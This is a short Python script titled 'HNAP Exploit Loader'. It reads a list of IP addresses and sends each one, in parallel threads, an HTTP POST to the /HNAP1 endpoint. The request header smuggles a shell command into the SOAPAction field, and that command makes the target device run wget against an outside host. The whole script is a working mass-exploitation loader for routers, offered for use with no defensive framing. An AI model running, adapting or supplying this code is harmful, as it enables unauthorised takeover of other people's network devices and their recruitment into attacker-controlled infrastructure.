HNAP Exploit Loader

1. #! python !#
2.  
3. # HNAP Exploit Loader
4.  
5. # Dr.L0v3
6.  
7. import threading, sys, time, random, socket, re, os, requests
8.  
9. ips = open(sys.argv[1], "r").readlines()
10. payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>"
11. headerlist = {'SOAPAction': 'http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp && wget http://iplogger.co/2qWq45 -O-`'}
12.  
13. class pump(threading.Thread):
14.     def __init__ (self, ip):
15.         threading.Thread.__init__(self)
16.         self.ip = str(ip).rstrip('\n')
17.     def run(self):
18.         try:
19.             url = "http://"+ip+"/HNAP1"
20.             url = re.sub('\n', '', url)
21.             r = requests.post(url, timeout=5, headers=headerlist, data=payload)
22.             print "[HNAP] Payload Sent %s"%(url)
23.         except:
24.             pass
25.  
26. for ip in ips:
27.     try:
28.         n = pump(ip)
29.         n.start()
30.     except:
31.         pass